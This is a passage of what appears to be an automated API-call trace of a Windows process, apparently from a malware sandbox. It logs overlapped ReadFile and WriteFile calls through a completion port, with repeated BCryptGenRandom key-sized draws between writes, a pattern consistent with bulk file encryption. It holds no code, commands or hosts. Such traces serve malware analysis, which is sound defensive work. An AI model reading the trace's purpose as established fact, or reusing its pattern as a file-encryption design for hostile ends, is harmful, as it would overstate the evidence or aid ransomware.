nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.891] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0162.396] CloseHandle (hObject=0x308) returned 1 [0162.397] free (_Block=0x3df0008) [0162.397] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0162.407] CloseHandle (hObject=0x338) returned 1 [0162.407] free (_Block=0x3f70048) [0162.407] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0162.418] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x16a0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0162.422] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0162.422] CloseHandle (hObject=0x2a4) returned 1 [0162.422] free (_Block=0x3d70450) [0162.423] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0162.423] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x16e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0162.423] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0162.503] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x1f38, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0162.504] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0162.514] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.514] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.514] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0162.515] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.515] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.515] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0162.515] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.515] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.515] free (_Block=0x3e305b8) [0162.515] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.515] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.516] free (_Block=0x1fa91d0) [0162.516] free (_Block=0x1fa2ed8) [0162.516] free (_Block=0x1fa90b8) [0162.516] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0162.516] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0162.539] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2230, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0162.549] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0162.626] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x16a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0162.626] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0162.638] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.638] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.638] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0162.638] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.638] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.638] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0162.639] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.639] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.639] free (_Block=0x3e305b8) [0162.639] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.639] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.639] free (_Block=0x1fa91d0) [0162.639] free (_Block=0x1fa2ed8) [0162.639] free (_Block=0x1fa90b8) [0162.639] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0162.639] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0162.783] CloseHandle (hObject=0x3cc) returned 1 [0162.783] free (_Block=0x1ff1e60) [0162.783] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0162.791] WriteFile (in: hFile=0x2a8, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x1b80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0162.791] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0162.797] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2b16e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0162.798] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0162.810] CloseHandle (hObject=0x338) returned 1 [0162.810] free (_Block=0x3f70048) [0162.810] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0162.820] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x4e82, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0162.828] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0162.841] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x2030, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0162.841] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0162.867] CloseHandle (hObject=0x308) returned 1 [0162.867] free (_Block=0x3df0008) [0162.867] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0162.867] WriteFile (in: hFile=0x2a4, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x34a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0162.867] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0162.868] CloseHandle (hObject=0x338) returned 1 [0162.868] free (_Block=0x1ff1e60) [0162.868] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0162.927] ReadFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x4ada, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0162.928] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0162.929] CloseHandle (hObject=0x2a8) returned 1 [0162.929] free (_Block=0x3d70450) [0162.929] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0162.929] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.929] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0162.929] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.930] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.930] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0162.930] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.930] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.930] free (_Block=0x3e305b8) [0162.930] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.930] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.930] free (_Block=0x1fa91d0) [0162.930] free (_Block=0x1fa2ed8) [0162.930] free (_Block=0x1fa90b8) [0162.930] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0162.931] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0162.931] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0xba0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0162.931] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0163.016] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xc88, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0163.016] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0163.024] CloseHandle (hObject=0x3cc) returned 1 [0163.025] free (_Block=0x3df0008) [0163.025] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0163.189] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x14c4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0163.192] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0163.192] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0163.193] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0163.674] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x66c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0163.674] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0163.675] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0163.675] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0163.710] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4816, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0163.714] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0163.715] CloseHandle (hObject=0x2a8) returned 1 [0163.716] free (_Block=0x3df0008) [0163.716] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0163.716] CloseHandle (hObject=0x308) returned 1 [0163.716] free (_Block=0x1ff1e60) [0163.716] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0163.727] CloseHandle (hObject=0x2a4) returned 1 [0163.728] free (_Block=0x3d70450) [0163.728] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0163.757] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xfe4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0163.757] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0163.758] CloseHandle (hObject=0x2a4) returned 1 [0163.758] free (_Block=0x3df0008) [0163.758] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0163.843] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.844] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.844] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0163.844] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.845] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.845] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0163.845] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0163.845] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0163.845] free (_Block=0x3e305b8) [0163.845] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0163.845] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0163.845] free (_Block=0x1fa91d0) [0163.845] free (_Block=0x1fa2ed8) [0163.845] free (_Block=0x1fa90b8) [0163.846] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0163.846] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0163.846] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xd00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0163.846] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0164.071] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x8e0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0164.071] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0164.071] CloseHandle (hObject=0x2a4) returned 1 [0164.072] free (_Block=0x3df0008) [0164.072] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0164.103] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.103] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0164.103] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.104] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0164.104] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0164.104] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0164.104] free (_Block=0x3e305b8) [0164.104] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0164.104] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0164.104] free (_Block=0x1fa91d0) [0164.104] free (_Block=0x1fa2ed8) [0164.104] free (_Block=0x1fa90b8) [0164.104] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0164.105] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0164.105] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0164.105] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0164.123] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x17c4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0164.152] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, 